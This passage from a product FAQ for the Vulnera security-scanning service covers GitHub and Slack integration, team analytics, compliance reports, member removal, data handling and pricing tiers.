- Save — scans now run automatically
What happens:
- PRs show Vulnera status checks
- Comments added to PRs with findings
- Merge blocked if critical issues found (configurable)
- Results uploaded to GitHub code scanning
Reference: Dashboard Guide - GitHub Integration
How do I set up Slack notifications?
Enable Slack integration:
- Go to vulnera.studio → Settings → Integrations → Slack
- Click Connect Slack Workspace
- Authorize Vulnera app in Slack
- Select notification channel
- Configure notification types:
- Critical findings (immediate)
- Daily digest
- Weekly summary
- Quota alerts
- Save
Example Slack message:
🚨 Critical Vulnerability Found
Repo: acme/backend
Finding: SQL Injection in /api/users.py
CVSS: 9.2
→ View Details [Link]
Reference: Dashboard Guide - Slack Integration
How do I view team analytics and usage?
Organization Analytics:
- Go to vulnera.studio → Organization → Analytics
- View dashboard:
- Total quota used vs. remaining
- Per-member breakdown (token consumption)
- Module usage (pie chart: Dependencies, SAST, Secrets, API)
- 6-month usage trend
- Top analyzed projects
Export report:
- Click Export
- Choose format: CSV, JSON, or PDF
- Download for spreadsheets or stakeholder reporting
Reference: Dashboard Guide - Quota Management
Can I generate compliance reports from the dashboard?
Yes, multiple report types:
- Go to vulnera.studio → Reports → Compliance Reports
- Select framework:
- SOC2 Type II
- ISO 27001
- GDPR
- HIPAA (Enterprise)
- PCI DSS (Enterprise)
- Select date range
- Click Generate → PDF/HTML download
- Share with auditors or stakeholders
Report contents:
- Security metrics summary
- Audit log excerpts
- Member access records
- Vulnerability remediation status
- Data handling compliance statements
Reference: Dashboard Guide - Reporting & Export
How do I remove a team member?
Remove member from organization:
- Go to vulnera.studio → Settings → Members
- Find member in list
- Click Remove (⋯ menu)
- Confirm removal — member loses access immediately
What happens:
- Member can no longer see organization scans
- Their scans remain in history (for audit)
- Their API keys are revoked
- Activity logged in audit trail
Reinvite later: Can re-invite removed members anytime
Reference: Organization Management - Removing Members
Security & Privacy
Is my code scanned securely?
Data handling:
| Data | Storage | Retention |
|---|---|---|
| Code artifacts | Encrypted in transit, encrypted at rest | 30 days (deleted) |
| Findings | Database (encrypted) | Until you delete |
| API keys | Hashed in database | Until revoked |
| User data | GDPR compliant | Until account deletion |
Reference: Architecture - Security Model
Can I see Vulnera’s source code?
Partial:
- Open-source: SAST rules, Secrets patterns, CLI utilities
- Proprietary: LLM integration, API backend, rate limiting logic
- Reference: GitHub open-source modules
Is on-premise deployment available?
Not yet. Vulnera does not currently support self-hosted deployment; support is planned for a future release.
Contact Vulnera for enterprise licenses.
Cost & Licensing
Is there a free tier?
Yes:
| Tier | Features | Cost |
|---|---|---|
| Community | SAST, Secrets, API (offline) | Free |
| Developer | +Dependency scanning, LLM (limited 40 tokens/day) | Free/API key |
| Organization | Team collaboration, 100 tokens/day, analytics | $99/month |
| Enterprise | Unlimited, SLA | Custom |
Reference: Quota & Pricing
What if I exceed my quota?
Billing options:
- Auto-upgrade — Automatically upgrade org to higher tier at month-end
- Per-use billing — Pay $0.10/token over quota (prepay)
- Reserved quota — Pre-purchase token packages at 20% discount
Set preferences in organization settings > Billing.
Getting Help
Resources:
- Documentation: Full guide
- Community: GitHub Discussions
- Web: vulnera.studio
- Enterprise SLA: Contact Vulnera sales for support plans.
For bugs: GitHub Issues